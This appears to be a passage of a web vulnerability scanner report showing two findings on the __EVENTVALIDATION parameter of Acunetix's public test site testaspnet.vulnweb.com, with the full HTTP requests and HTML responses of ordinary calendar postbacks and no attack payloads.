URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8142&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAPDcFINoIZGRkEpnMXM%2BkMJDU%2FpF7%2BH%2Fz8hOsBtE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK%2FIrmDwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBcyf4KZNlvXAN6MkLaDguN%2Fjweg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:00 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAPDcFINoIZGRkEpnMXM+kMJDU/pF7+H/z8hOsBtE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK/IrmDwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDBcyf4KZNlvXAN6MkLaDguN/jweg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:White" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8251&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAQ0asddoIZGRkAq9NFnK87N%2B4870qlVFYLvTxRoc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK46G%2FDwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DCGl7Tp9SKa4vGb5h%2F%2Fvz8UkzsQE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:50 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgCAQ0asddoIZGRkAq9NFnK87N+4870qlVFYLvTxRoc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK46G/DwKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DCGl7Tp9SKa4vGb5h//vz8UkzsQE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:White" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:Black" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> 